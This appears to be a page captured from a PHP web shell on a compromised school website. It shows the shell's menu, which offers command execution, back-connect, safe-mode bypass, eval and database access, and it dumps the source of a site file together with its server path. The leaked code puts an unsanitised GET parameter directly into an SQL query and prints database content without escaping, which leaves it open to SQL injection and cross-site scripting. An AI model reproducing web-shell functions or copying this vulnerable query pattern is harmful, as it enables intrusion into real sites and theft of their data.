File Manger -- Command Execute -- Back Connect -- BypasS Command eXecute(SF-DF) -- BypasS Directory -- Eval -- Data Base -- Server Information
File Name : /home/no2airforceschoo/domains/no2airforceschoolgwl.com/public_html/magzinedetail.php<?php include("admin/dlogin.php"); $bid=@$_GET['bid']; $str="select * from blogs where bid=$bid"; $rs=mysqli_query($conn, $str); @$row=mysqli_fetch_array($rs); $title=$row['title']; $description=$row['description']; $image=$row['image']; $btime=$row['btime']; $pdf=$row['pdf']; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <head><title><?php print $title;?> No.2 Air Force School</title> <meta charset="UTF-8"> <meta name="description" content="<?php print $title;?> , No.2 Air Force School"> <meta name="keywords" content="<?php print $title;?> No.2 Air Force School"> <link rel="stylesheet" id="style-css" href="images/style.css" type="text/css" media="screen" /> <script type="text/javascript" src="js/jquery1.min.js"></script> <!-- start menu --> <!--start slider --> <link rel="stylesheet" href="css/fwslider.css" media="all"> <script src="js/jquery-ui.min.js"></script> <script src="js/css3-mediaqueries.js"></script> <script src="js/fwslider.js"></script> </head> <body> <div> <div class="MainBody"> <div class="maindiv"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><?php include ("header.php"); ?></td> </tr> <tr> <td><table width="100%" border="0" cellpadding="0" cellspacing="0" class="maintable" align="center"> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="maintablebg"> <tr> <td valign="top"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="70%" valign="top"><table width="100%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td height="5"></td> </tr> <tr> <td class="welhead">eMagzine</td> </tr> <tr> <td class="menu_down_line"></td> </tr> <tr><td height="10"></td></tr> <tr> <td><table width="100%" border="0" cellspacing="0" cellpadding="5" class="data"> <tr> <td width="97%"><h3> <?php print $title;?></h3> <?php if(!empty($pdf)){ ?><strong>PDF/Word document file:</strong> <a href="blogfile/<?php echo $pdf;?>" target="_blank"><?php print $pdf;?></a><br /><?php }?> </td> </tr> <tr> <td valign="top" class="data"><?php if(!empty($image)){ ?> <a href="blogphoto/<?php print $image;?>" target="_blank"><img src="blogphoto/<?php print $image;?>" width="100%" border="0" /></a> <?php }?> <br /> <?php print $description;?></td> </tr> </table></td> </tr> <tr><td height="10"></td></tr> </table></td> <td width="30%" align="center" valign="top"><table width="98%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td><?php include("rightsidebar.php")?></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td height="10" valign="top"></td> </tr> <tr> <td><?php include ("footer.php"); ?></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td height="10" valign="top"></td> </tr> </table> </div> </div> </body> </html>
Coded by Amin Shokohi (Pejvak)